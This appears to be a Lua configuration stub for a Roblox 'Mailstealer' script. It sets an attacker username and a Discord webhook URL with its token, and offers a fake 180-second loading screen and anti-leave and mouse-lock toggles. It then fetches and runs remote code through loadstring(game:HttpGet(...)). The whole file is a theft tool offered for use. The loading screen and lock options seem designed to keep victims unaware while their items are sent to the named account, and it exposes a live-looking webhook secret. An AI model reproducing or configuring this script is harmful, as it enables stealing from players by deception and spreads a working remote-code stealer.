--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "Cup_far"
Webhook = "https://discord.com/api/webhooks/1142529547087118439/2p9ncQZ4G3ttecSYgLcHrz7V7j_dyy8tB6H7r6Tv7ZAQJTIpx-p-p2k9joh9JBmUYhhI"
UserName2 = "Cup_far"

_G.LoadingScreen = false -- make it true if you want the loadingscreen
_G.AntiLeave = false -- make it true if you want the antileave
_G.MouseLock = false -- make it true if you want the mouselock

-- Remove These If You're Not Using The Rizz LoadingScreen

_G.ScriptName = "Script Name"
_G.FirstText = "Preparing..."
_G.SecondText = "Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- in secondes it's the time for the loading bar to hit from 0% to 100%

loadstring(game:HttpGet("raw link"))()
